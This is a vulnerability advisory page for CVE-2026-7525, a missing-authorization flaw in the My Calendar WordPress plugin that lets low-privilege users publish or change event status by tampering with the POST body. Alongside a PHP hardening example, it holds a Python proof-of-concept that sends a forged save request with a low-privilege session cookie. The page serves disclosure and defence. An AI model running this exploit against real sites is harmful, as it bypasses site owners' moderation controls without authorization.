Security Vulnerability Report

CVE-2026-7525 CVSS 4.3 MEDIUM

Published: 2026-05-14 05:16:46
Last Modified: 2026-05-14 14:29:02

Description

The My Calendar – Accessible Event Manager plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 3.7.9. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with custom-level access and above, to bypass the moderation and approval workflow by tampering with the POST body to publish events or set other unauthorized statuses such as cancelled or private, in ways their role does not permit. While the UI correctly restricts low-privilege users to a draft-only submit button, this restriction is enforced only client-side, making it trivially bypassable by directly manipulating the POST request.
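As an added illustration (not My Calendar's own code), the following hypothetical save handler shows the pattern the description attributes to the plugin, storing whatever event_status the POST body carries after a UI-only restriction, beside a hardened version that decides the allowed status server-side from the user's capabilities. The capability name mc_approve_events, the function names and the status codes are assumptions; 0 = draft and 1 = published follow the PoC on this page.

```php
<?php
// Added illustration, not My Calendar's code. Capability name and status
// codes are assumptions (0 = draft, 1 = published, as in the PoC below).

const STATUS_DRAFT     = 0;
const STATUS_PUBLISHED = 1;

// Vulnerable (CWE-862): the UI hides the "publish" button from low-privilege
// users, but the server trusts the posted status as-is.
function vulnerable_event_status( array $post ) {
    return isset( $post['event_status'] ) ? (int) $post['event_status'] : STATUS_DRAFT;
}

// Hardened: the permitted status is derived from the user's capabilities on
// the server. Non-approvers are forced to draft no matter what they posted,
// and approvers are limited to the workflow's known statuses (cancelled and
// private would be added to the same allow-list).
function hardened_event_status( array $post, callable $user_can ) {
    $requested = isset( $post['event_status'] ) ? (int) $post['event_status'] : STATUS_DRAFT;
    if ( ! $user_can( 'mc_approve_events' ) ) {
        return STATUS_DRAFT;
    }
    $allowed = array( STATUS_DRAFT, STATUS_PUBLISHED );
    return in_array( $requested, $allowed, true ) ? $requested : STATUS_DRAFT;
}

// In a real WordPress handler this sits after the nonce check, e.g.
//   check_admin_referer( 'mc_nonce' );            // nonce name assumed
//   $status = hardened_event_status( $_POST, 'current_user_can' );
// A valid nonce proves the form was rendered for this user; it is not an
// authorization check and does not prove the user may publish.

// Stand-alone demo with a constructed, tampered POST body and stand-ins for
// current_user_can().
$tampered    = array( 'event_status' => '1' );
$contributor = function ( $cap ) { return false; };
$approver    = function ( $cap ) { return 'mc_approve_events' === $cap; };

var_dump( vulnerable_event_status( $tampered ) === STATUS_PUBLISHED );          // true: bypassed
var_dump( hardened_event_status( $tampered, $contributor ) === STATUS_DRAFT ); // true: forced to draft
var_dump( hardened_event_status( $tampered, $approver ) === STATUS_PUBLISHED ); // true: permitted
```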

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

My Calendar - Accessible Event Manager <= 3.7.9 (no NVD configuration data available)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target configuration
target_url = "http://example.com/wp-admin/admin.php?page=my-calendar-manage"
attacker_cookie = "wordpress_logged_in_xxxxxxxxx=logged_in_session_string"  # Low-privilege user cookie

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
    "Cookie": attacker_cookie,
    "Content-Type": "application/x-www-form-urlencoded",
}

# Payload to bypass client-side restrictions
# By default, the UI might send event_status=0 (draft).
# We modify it to event_status=1 (published) to bypass the moderation workflow.
payload = {
    "action": "mc_save_event",  # The action hook for saving events
    "event_title": "PoC Published Event",
    "event_begin": "2026-05-15",
    "event_end": "2026-05-15",
    "event_status": "1",  # 1 represents Published (Bypass UI restriction)
    "event_access": "public",
    "mc_nonce": "valid_nonce_value_here",  # Valid nonce is required for authenticated requests
}

try:
    response = requests.post(target_url, data=payload, headers=headers)
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Verify the event status on the calendar. It should be published without approval.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] Error occurred: {e}")
```

References

- https://github.com/joedolson/my-calendar/commit/98aef8fbfc6ca4cfe50aaa36761d5f1eb629dfe4
- https://plugins.trac.wordpress.org/browser/my-calendar/tags/3.7.4/my-calendar-event-editor.php#L406
- https://plugins.trac.wordpress.org/browser/my-calendar/tags/3.7.4/my-calendar-event-editor.php#L601
- https://plugins.trac.wordpress.org/browser/my-calendar/tags/3.7.4/my-calendar-event-editor.php#L2384
- https://plugins.trac.wordpress.org/browser/my-calendar/tags/3.7.9/my-calendar-event-editor.php#L406
- https://plugins.trac.wordpress.org/browser/my-calendar/tags/3.7.9/my-calendar-event-editor.php#L601
- https://plugins.trac.wordpress.org/browser/my-calendar/tags/3.7.9/my-calendar-event-editor.php#L2384
- https://plugins.trac.wordpress.org/browser/my-calendar/trunk/my-calendar-event-editor.php#L406
- https://plugins.trac.wordpress.org/browser/my-calendar/trunk/my-calendar-event-editor.php#L601
- https://plugins.trac.wordpress.org/browser/my-calendar/trunk/my-calendar-event-editor.php#L2384
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3527861%40my-calendar&new=3527861%40my-calendar&sfp_email=&sfph_mail=
- https://www.wordfence.com/threat-intel/vulnerabilities/id/3e27c0b0-c74f-47ad-b9ed-9fd6bd05d040?source=cve

Weakness: CWE-862 (Missing Authorization)
NVD status: Deferred
CVSS v3.1 exploitability score: 2.8; impact score: 1.4